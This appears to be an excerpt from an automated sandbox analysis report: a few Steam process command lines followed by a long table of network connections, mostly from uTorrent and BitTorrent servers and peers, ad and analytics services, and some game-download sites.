"C:\Program Files (x86)\Steam\bin\steamservice.exe" /Install
C:\Program Files (x86)\Steam\steam.exe
"C:\Program Files (x86)\Steam\steam.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | i-6000.b-47142.ut.bench.utorrent.com | udp |
| US | 54.167.59.98:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| US | 8.8.8.8:53 | 98.59.167.54.in-addr.arpa | udp |
| US | 67.215.246.203:80 | update.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| N/A | 10.127.0.1:5351 | udp | |
| US | 98.143.146.7:80 | legacy.utorrent.com | tcp |
| GB | 87.248.205.1:80 | apps.bittorrent.com | tcp |
| US | 34.192.104.143:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| US | 98.143.146.7:80 | legacy.utorrent.com | tcp |
| IS | 82.221.103.244:6881 | router.utorrent.com | udp |
| US | 67.215.246.10:6881 | router.bittorrent.com | udp |
| US | 8.8.8.8:53 | 143.104.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.103.221.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.246.215.67.in-addr.arpa | udp |
| BR | 187.123.3.105:9148 | udp | |
| US | 72.220.104.94:43077 | udp | |
| RU | 95.26.230.139:28371 | udp | |
| BR | 177.124.5.86:16418 | udp | |
| AT | 84.115.236.46:54641 | udp | |
| ES | 46.6.63.190:12898 | udp | |
| KR | 119.56.238.115:32692 | udp | |
| US | 173.254.195.58:80 | update.bittorrent.com | tcp |
| JP | 180.197.61.30:51413 | udp | |
| IT | 37.116.197.74:6881 | udp | |
| CH | 84.16.75.227:6881 | udp | |
| SE | 2.249.115.125:27260 | udp | |
| UA | 37.57.95.1:53008 | udp | |
| JP | 125.30.146.12:30388 | udp | |
| PT | 89.114.98.205:6881 | udp | |
| FR | 62.210.74.109:5870 | udp | |
| KZ | 213.232.201.126:32000 | udp | |
| BR | 131.108.15.138:36768 | udp | |
| RU | 31.135.50.4:2821 | udp | |
| AT | 83.215.126.78:50321 | udp | |
| MX | 177.248.139.157:41165 | udp | |
| KR | 1.233.76.216:7469 | udp | |
| US | 34.192.104.143:80 | i-49.b-47142.ut.bench.utorrent.com | tcp |
| BR | 187.106.100.49:46165 | udp | |
| NL | 88.151.32.222:62161 | udp | |
| US | 3.214.87.95:80 | i-49.b-47142.ut.bench.utorrent.com | tcp |
| NL | 178.162.173.227:28002 | udp | |
| ES | 90.69.180.6:8621 | udp | |
| NL | 46.232.210.34:64096 | udp | |
| CN | 218.91.153.60:54266 | udp | |
| NL | 192.42.116.242:54363 | udp | |
| DE | 5.189.140.45:10019 | udp | |
| NL | 5.79.93.242:18458 | udp | |
| CA | 148.163.171.3:6881 | udp | |
| NL | 95.99.60.125:65370 | udp | |
| FR | 217.182.36.204:45397 | udp | |
| HK | 183.178.204.120:20043 | udp | |
| NL | 185.21.216.184:51317 | udp | |
| NL | 37.48.89.158:43638 | udp | |
| RU | 46.173.46.22:49001 | udp | |
| IT | 2.238.196.203:6881 | udp | |
| FR | 188.165.240.192:50967 | udp | |
| US | 136.50.248.30:54832 | udp | |
| NL | 95.211.198.83:28006 | udp | |
| US | 195.137.220.189:6880 | udp | |
| GB | 86.185.78.127:6889 | udp | |
| ES | 185.245.176.112:34945 | udp | |
| SG | 43.128.104.53:10020 | udp | |
| BR | 45.4.34.139:25078 | udp | |
| DE | 37.201.4.119:51119 | udp | |
| EG | 41.234.69.52:50173 | udp | |
| US | 3.214.87.95:80 | i-49.b-47142.ut.bench.utorrent.com | tcp |
| US | 8.8.8.8:53 | 46.236.115.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.63.6.46.in-addr.arpa | udp |
| ES | 77.26.199.215:6881 | udp | |
| RU | 185.17.131.3:11355 | udp | |
| FR | 185.157.244.162:62222 | udp | |
| RU | 93.157.22.190:1300 | udp | |
| US | 8.8.8.8:53 | 115.238.56.119.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.61.197.180.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.197.116.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.75.16.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.115.249.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.95.57.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.146.30.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.98.114.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.74.210.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.201.232.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.15.108.131.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.50.135.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.126.215.83.in-addr.arpa | udp |
| UA | 109.162.44.71:33529 | udp | |
| SG | 213.35.107.2:44227 | udp | |
| FR | 91.165.47.54:42184 | udp | |
| NL | 163.172.220.50:16754 | udp | |
| US | 8.8.8.8:53 | 157.139.248.177.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.76.233.1.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.100.106.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.32.151.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.173.162.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.180.69.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.153.91.218.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.116.42.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.140.189.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.93.79.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.171.163.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.60.99.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.36.182.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.204.178.183.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.216.21.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.89.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.46.173.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.196.238.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.240.165.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.248.50.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.198.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.220.137.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.78.185.86.in-addr.arpa | udp |
| RU | 109.173.74.152:60284 | udp | |
| GB | 87.248.204.1:80 | video.rainberrytv.com | tcp |
| RU | 83.234.203.10:11488 | udp | |
| PA | 190.141.43.16:37013 | udp | |
| KR | 125.240.34.205:8103 | udp | |
| ES | 185.13.202.152:4760 | udp | |
| GT | 181.174.67.87:62638 | udp | |
| MX | 187.153.66.197:16813 | udp | |
| BO | 45.70.183.22:60378 | udp | |
| CA | 67.225.54.132:40041 | udp | |
| DE | 91.96.241.193:6881 | udp | |
| GB | 87.248.204.1:80 | video.rainberrytv.com | tcp |
| GB | 181.215.176.83:7646 | udp | |
| CN | 220.180.167.230:15000 | udp | |
| RU | 95.24.69.128:4861 | udp | |
| US | 44.196.243.250:80 | i-64.b-47142.ut.bench.utorrent.com | tcp |
| US | 8.8.8.8:53 | 71.44.162.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.107.35.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.47.165.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.220.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.74.173.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.43.141.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.203.234.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.34.240.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.202.13.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.67.174.181.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.66.153.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.183.70.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.54.225.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.241.96.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.176.215.181.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.167.180.220.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.69.24.95.in-addr.arpa | udp |
| RU | 185.134.120.172:6881 | udp | |
| FR | 94.23.215.83:6882 | udp | |
| NL | 95.179.136.151:11158 | udp | |
| MX | 187.246.249.11:53939 | udp | |
| CN | 182.136.186.223:25604 | udp | |
| KR | 121.144.127.220:6881 | udp | |
| IQ | 37.239.68.18:49397 | udp | |
| CH | 193.32.127.220:46779 | udp | |
| US | 44.196.243.250:80 | i-29.b-47142.ut.bench.utorrent.com | tcp |
| US | 8.8.8.8:53 | 220.127.144.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.68.239.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.127.32.193.in-addr.arpa | udp |
| GB | 87.248.204.1:443 | cdn.bitmedianetwork.com | tcp |
| GB | 87.248.204.1:443 | cdn.bitmedianetwork.com | tcp |
| US | 44.196.243.250:80 | i-62.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.165.232.71:80 | utclient.utorrent.com | tcp |
| US | 3.165.232.71:80 | utclient.utorrent.com | tcp |
| US | 98.143.146.7:80 | utorrent.com | tcp |
| US | 98.143.146.7:80 | utorrent.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| US | 98.143.146.7:80 | utorrent.com | tcp |
| US | 34.196.244.100:80 | i-62.b-47142.ut.bench.utorrent.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| IN | 49.47.132.18:53813 | udp | |
| IN | 47.9.130.197:43453 | udp | |
| SG | 121.6.183.22:6881 | udp | |
| US | 18.223.137.220:6881 | udp | |
| US | 54.214.62.31:6881 | udp | |
| US | 13.58.27.33:6881 | udp | |
| US | 54.214.62.55:6881 | udp | |
| PL | 31.0.177.193:11730 | udp | |
| ID | 103.162.63.75:1086 | udp | |
| TH | 49.228.121.156:22351 | udp | |
| IN | 223.227.120.14:23186 | udp | |
| BR | 167.250.139.10:7867 | udp | |
| HU | 79.122.75.10:41824 | udp | |
| BR | 179.106.75.10:44572 | udp | |
| IN | 49.204.141.221:40830 | udp | |
| RU | 109.161.37.136:6881 | udp | |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| US | 3.165.232.71:80 | utclient.utorrent.com | tcp |
| US | 3.165.232.71:80 | utclient.utorrent.com | tcp |
| US | 3.165.232.71:80 | utclient.utorrent.com | tcp |
| IE | 3.162.140.86:80 | www.utorrent.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 31.62.214.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.137.223.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.27.58.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.62.214.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.177.0.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.63.162.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.121.228.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.120.227.223.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.139.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.75.122.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.75.106.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.141.204.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.244.196.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.37.161.109.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | www.googleoptimize.com | tcp |
| GB | 216.58.212.234:80 | fonts.googleapis.com | tcp |
| US | 34.192.104.143:80 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| IE | 3.162.140.86:443 | www.utorrent.com | tcp |
| GB | 88.221.134.232:443 | ced.sascdn.com | tcp |
| GB | 172.217.16.227:80 | fonts.gstatic.com | tcp |
| US | 34.192.104.143:80 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| GB | 216.58.204.78:80 | www.youtube.com | tcp |
| US | 44.197.0.133:443 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| IE | 3.162.140.86:443 | www.utorrent.com | tcp |
| GB | 2.18.108.192:443 | ads.pubmatic.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| IE | 3.162.140.25:443 | sdk.privacy-center.org | tcp |
| US | 34.196.244.100:80 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 34.196.244.100:80 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 16.182.99.149:80 | utclient-staging.utorrent.com | tcp |
| US | 34.196.244.100:80 | i-31.b-47142.ut.bench.utorrent.com | tcp |
| US | 16.182.99.149:80 | utclient-staging.utorrent.com | tcp |
| US | 54.70.28.180:6881 | udp | |
| HN | 181.115.118.19:5816 | udp | |
| BR | 187.13.43.187:6881 | udp | |
| CN | 114.226.84.242:51413 | udp | |
| BR | 167.249.130.197:50321 | udp | |
| US | 75.113.169.118:59161 | udp | |
| CN | 111.121.48.248:17027 | udp | |
| US | 67.185.69.209:6881 | udp | |
| KR | 175.125.25.148:41114 | udp | |
| UA | 193.194.110.164:47442 | udp | |
| DZ | 41.107.157.160:38020 | udp | |
| IL | 5.29.8.123:28324 | udp | |
| BR | 179.233.4.224:50321 | udp | |
| NZ | 161.29.140.189:11736 | udp | |
| CN | 123.132.253.152:53613 | udp | |
| US | 198.210.116.188:6881 | udp | |
| RU | 95.24.197.128:49429 | udp | |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 25.140.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.197.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.28.70.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.118.115.181.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.99.182.16.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.43.13.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.84.226.114.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.130.249.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.169.113.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.48.121.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.69.185.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.25.125.175.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.110.194.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.157.107.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.8.29.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.4.233.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.140.29.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.253.132.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.116.210.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.197.24.95.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| IE | 3.162.140.25:443 | sdk.privacy-center.org | tcp |
| GB | 2.18.190.136:443 | p.typekit.net | tcp |
| RU | 5.18.177.86:19638 | udp | |
| RU | 185.34.241.86:52065 | udp | |
| US | 73.197.126.217:49865 | udp | |
| KR | 1.241.37.136:6882 | udp | |
| CN | 221.178.195.80:15000 | udp | |
| PE | 179.6.164.26:24226 | udp | |
| BR | 181.233.17.201:1831 | udp | |
| BR | 179.96.129.111:40331 | udp | |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 35.171.49.86:6992 | udp | |
| CO | 181.59.2.82:2924 | udp | |
| US | 54.70.174.84:6881 | udp | |
| RU | 95.183.126.78:6881 | udp | |
| KR | 1.248.139.157:6881 | udp | |
| VN | 115.79.74.15:49176 | udp | |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 111.129.96.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.126.183.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.139.248.1.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.74.79.115.in-addr.arpa | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| NL | 89.149.192.193:443 | www9.smartadserver.com | tcp |
| NL | 89.149.192.193:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| CN | 223.107.204.79:23750 | udp | |
| MX | 187.226.63.75:48032 | udp | |
| CN | 171.43.204.79:35715 | udp | |
| NL | 89.149.192.193:443 | www9.smartadserver.com | tcp |
| US | 157.131.246.19:20120 | udp | |
| PT | 109.51.118.19:6881 | udp | |
| US | 66.201.135.23:9010 | udp | |
| VE | 186.92.189.234:64643 | udp | |
| BR | 181.174.222.70:65021 | udp | |
| US | 204.79.197.239:443 | tcp | |
| IQ | 185.136.148.111:14596 | udp | |
| FR | 109.190.193.180:53443 | udp | |
| BR | 179.215.96.34:2329 | udp | |
| RU | 37.194.113.86:6881 | udp | |
| CO | 201.219.194.82:20518 | udp | |
| AZ | 185.146.113.86:59197 | udp | |
| US | 172.67.10.107:443 | images.atmequiz.com | tcp |
| US | 172.67.10.107:443 | images.atmequiz.com | tcp |
| N/A | 10.127.0.42:50993 | tcp | |
| GB | 142.250.200.2:443 | securepubads.g.doubleclick.net | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 209.127.134.241:31026 | udp | |
| MN | 103.212.119.129:15116 | udp | |
| DE | 38.242.237.39:6881 | udp | |
| CN | 182.118.46.36:40207 | udp | |
| GB | 142.250.200.2:443 | securepubads.g.doubleclick.net | udp |
| US | 151.101.193.44:443 | videos.taboola.com | tcp |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| RU | 185.3.182.19:2313 | udp | |
| DZ | 197.207.217.3:38772 | udp | |
| NL | 178.250.1.25:443 | csm.nl3.eu.criteo.net | tcp |
| US | 97.115.238.137:51413 | udp | |
| MX | 177.245.152.152:35689 | udp | |
| IE | 13.74.129.1:443 | c.clarity.ms | tcp |
| NL | 185.235.87.191:443 | ag.gbc.criteo.com | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| FR | 185.235.86.251:443 | gem.gbc.criteo.com | tcp |
| GB | 87.248.204.1:80 | video.rainberrytv.com | tcp |
| GB | 87.248.204.1:80 | video.rainberrytv.com | tcp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 4.227.249.197:443 | u.clarity.ms | tcp |
| NL | 141.226.228.48:443 | am-trc-events.taboola.com | tcp |
| NL | 141.226.228.48:443 | am-trc-events.taboola.com | tcp |
| NL | 141.226.228.48:443 | am-trc-events.taboola.com | tcp |
| US | 172.67.10.107:443 | images.atmequiz.com | tcp |
| MX | 177.245.153.165:3461 | udp | |
| NL | 185.89.210.82:443 | ib.adnxs.com | tcp |
| IE | 20.47.117.32:443 | www.temu.com | tcp |
| US | 141.226.224.32:443 | cds.taboola.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| IE | 18.66.171.73:443 | api.privacy-center.org | tcp |
| US | 44.196.243.250:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| US | 104.16.213.94:443 | media.adaware.com | tcp |
| GB | 87.248.204.1:80 | video.rainberrytv.com | tcp |
| US | 52.204.42.239:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| IS | 82.221.103.246:80 | update.utorrent.li | tcp |
| US | 3.165.232.11:80 | utclient.utorrent.com | tcp |
| GB | 87.248.205.1:80 | video.rainberrytv.com | tcp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 52.204.42.239:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 18.213.206.169:443 | ledger.bt.co | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.194.83.192:443 | airdrop.bt.co | tcp |
| US | 44.197.0.133:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| N/A | 127.0.0.1:10702 | tcp | |
| NL | 178.250.1.25:443 | csm.nl3.eu.criteo.net | tcp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 52.204.42.239:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.214.87.95:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| GB | 95.101.143.219:443 | www.bing.com | tcp |
| US | 52.204.42.239:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 3.210.17.85:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 172.67.218.22:80 | skidrowgamereloaded.co | tcp |
| US | 172.67.218.22:80 | skidrowgamereloaded.co | tcp |
| US | 172.67.218.22:443 | skidrowgamereloaded.co | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 172.64.147.188:443 | kit.fontawesome.com | tcp |
| GB | 142.250.187.238:443 | google.com | tcp |
| GB | 142.250.187.238:443 | google.com | udp |
| RU | 88.212.201.204:443 | counter.yadro.ru | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| US | 172.67.139.119:443 | ka-f.fontawesome.com | tcp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 172.217.169.74:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.200.38:443 | static.doubleclick.net | tcp |
| GB | 142.250.200.33:443 | yt3.ggpht.com | tcp |
| GB | 172.217.169.74:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 204.79.197.239:443 | tcp | |
| GB | 23.73.139.43:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 172.67.159.189:443 | gamecloudshare.uno | tcp |
| US | 172.67.159.189:443 | gamecloudshare.uno | tcp |
| US | 104.19.230.21:443 | api.hcaptcha.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.19.229.21:443 | api.hcaptcha.com | tcp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.187.238:443 | google.com | udp |
| US | 172.67.222.15:443 | playsafedownloads.space | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 172.217.169.34:443 | googleads.g.doubleclick.net | udp |
| UA | 109.110.71.145:1665 | udp | |
| RU | 91.203.8.137:6881 | udp | |
| RU | 109.74.222.35:41937 | udp | |
| US | 73.249.2.31:6881 | udp | |
| US | 8.8.4.4:443 | dns.google | udp |
| NL | 81.17.55.113:443 | www9.smartadserver.com | tcp |
| US | 131.153.148.2:443 | tcp | |
| US | 185.167.164.53:443 | tcp | |
| GB | 87.248.204.1:443 | video.rainberrytv.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| US | 131.153.148.2:443 | tcp | |
| US | 185.167.164.53:443 | tcp | |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| NL | 81.17.55.113:443 | www9.smartadserver.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.197.0.133:443 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| US | 44.196.243.250:80 | i-38.b-47142.ut.bench.utorrent.com | tcp |
| RU | 217.15.128.212:7092 | udp | |
| NL | 83.87.169.48:31958 | udp | |
| UA | 91.235.196.195:20563 | udp | |
| RU | 5.187.87.207:35128 | udp | |
| US | 107.115.178.97:37602 | udp | |
| GB | 142.250.187.238:443 | google.com | udp |
| KR | 121.170.20.76:44147 | udp | |
| RU | 79.165.35.124:6881 | udp | |
| CN | 222.247.225.100:9786 | udp | |
| BR | 177.159.78.125:6881 | udp | |
| KR | 121.128.144.252:6881 | udp | |
| US | 23.125.130.131:49178 | udp | |
| NL | 91.199.227.105:11129 | udp | |
| RU | 46.50.137.9:51413 | udp | |
| DE | 93.192.236.148:51413 | udp | |
| CN | 101.93.81.143:8706 | udp | |
| ES | 87.218.92.87:6889 | udp | |
| AU | 157.211.252.95:11439 | udp | |
| IS | 31.209.235.182:50321 | udp | |
| US | 8.8.4.4:443 | dns.google | udp |
